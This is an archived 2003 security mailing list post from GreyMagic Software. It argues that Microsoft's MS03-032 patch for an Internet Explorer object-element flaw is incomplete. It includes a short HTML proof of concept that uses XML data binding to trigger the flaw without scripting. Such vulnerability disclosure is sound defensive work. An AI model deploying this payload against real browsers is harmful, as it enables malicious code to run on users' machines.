lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 8 Sep 2003 16:52:12 +0200
From: "GreyMagic Software" <security@...ymagic.com>
To: "NTBugtraq" <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
	"Bugtraq" <bugtraq@...urityfocus.com>,
	<full-disclosure@...ts.netsys.com>, <vulnwatch@...nwatch.org>
Cc: <http-equiv@...ite.com>,
	"Microsoft Security Response Center" <secure@...rosoft.com>
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032


>The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.

>1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ